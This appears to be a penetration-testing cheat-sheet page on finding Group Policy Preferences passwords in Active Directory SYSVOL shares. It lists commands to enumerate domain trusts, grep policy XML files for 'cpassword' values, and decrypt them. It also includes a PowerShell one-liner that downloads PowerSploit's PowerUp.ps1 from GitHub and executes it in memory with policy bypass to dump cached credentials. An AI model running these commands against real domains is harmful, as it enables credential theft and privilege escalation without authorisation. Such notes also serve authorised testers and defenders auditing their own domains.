Password in GPO

Background#

How to check for#

Note that if the domain have trust with another domain it is likely that your user will access the SYSVOL of that domain as well.
So make sure to check both (or however many domains there are trust too) domains SYSVOL.

To check which other domains there are trust to

nltest /domain_trusts

Using CMD findstr#

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Using PowerUp.ps1#

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1'); Get-CachedGPPPassword"

Semi-manually#

Mount the SYSVOL of a Domain Controller

net use K: \\dc01\sysvol
K:
cd <domain>\Policies
gci -recurse -filter "*.xml" | select-string cpass | out-file C:\Users\<YOUUSER>\Documents\gppresults.txt

If you found a string you can decrypt it with:

gpp-decyypt <string>

References#

For more info: https://adsecurity.org/?p=2288